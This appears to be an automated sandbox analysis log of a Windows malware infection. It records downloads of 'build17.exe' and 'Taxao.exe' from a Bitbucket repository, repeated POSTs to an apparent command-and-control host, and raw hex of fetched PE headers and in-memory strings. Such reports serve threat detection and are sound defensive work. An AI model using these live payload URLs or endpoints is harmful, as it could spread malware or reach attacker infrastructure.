20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 26 Oct 2021 10:18:27 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Wed, 27 Oct 2021 10:18:27 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 26 Oct 2021 10:18:29 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Wed, 27 Oct 2021 10:18:29 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 26 Oct 2021 10:18:30 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Wed, 27 Oct 2021 10:18:30 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /abobaajshdasdjk/zalupaaaaaaa/downloads/build17.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /be841f15-ba7d-44ef-a2c3-578559359f2a/downloads/c8550f1d-c01f-4e90-b203-096040eab0a5/build17.exe?Signature=d1Q4kDrNefh8flM56O9HjpukLbc%3D&Expires=1635245205&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=_SHespFRgAw4oIOHESVoeGe0bV7HH580&response-content-disposition=attachment%3B%20filename%3D%22build17.exe%22 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fpoun.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hyphlcj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bjids.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uhvwsix.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ywnjvr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gdexrdsu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qfwytqyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wxdyri.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://btuxwhqhi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mkfnhxvt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bdkqmcnwul.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ybhqredled.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://blfot.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://omtfy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lbogbgbuwy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lxiqp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iasspuo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: wedoepicsht.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cnfwnf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://omlspe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vmnbd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wtdiibg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://huqgnk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fweeaoqx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oaqnv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://owfpwtmb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ctchjnbd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qqhcubp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tsxmpl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gftyqi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xoeqotyq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jbvjnkymp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wbmrftkx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qdoie.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ngdduvqscc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: brandyjaggers.com

Source: A8D4.exe, 0000001B.00000002.507764805.000000000B0C0000.00000004.00000040.sdmp	String found in binary or memory: http://bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe
Source: A8D4.exe, 0000001B.00000002.507764805.000000000B0C0000.00000004.00000040.sdmp	String found in binary or memory: http://bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe;
Source: A8D4.exe, 0000001B.00000002.507764805.000000000B0C0000.00000004.00000040.sdmp	String found in binary or memory: http://bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe;.txtt64
Source: A8D4.exe, 0000001B.00000002.507764805.000000000B0C0000.00000004.00000040.sdmp	String found in binary or memory: http://bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exeonfig4F
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: A8D4.exe, 0000001B.00000002.508143079.000000000BCBD000.00000004.00000001.sdmp, CP8Z9ZN3KMVU03RJ.exe, 0000001D.00000000.500345760.000000000040A000.00000008.00020000.sdmp, Taxao[1].exe.27.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: explorer.exe, 00000003.00000000.283035317.0000000006840000.00000004.00000001.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: mozglue[1].dll.27.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://www.mozilla.com0
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: A8D4.exe, 0000001B.00000002.508338072.000000000C1D5000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/be841f15-ba7d-44ef-a2c3-578559359f2a/downloads/03816c1a-92b3-
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
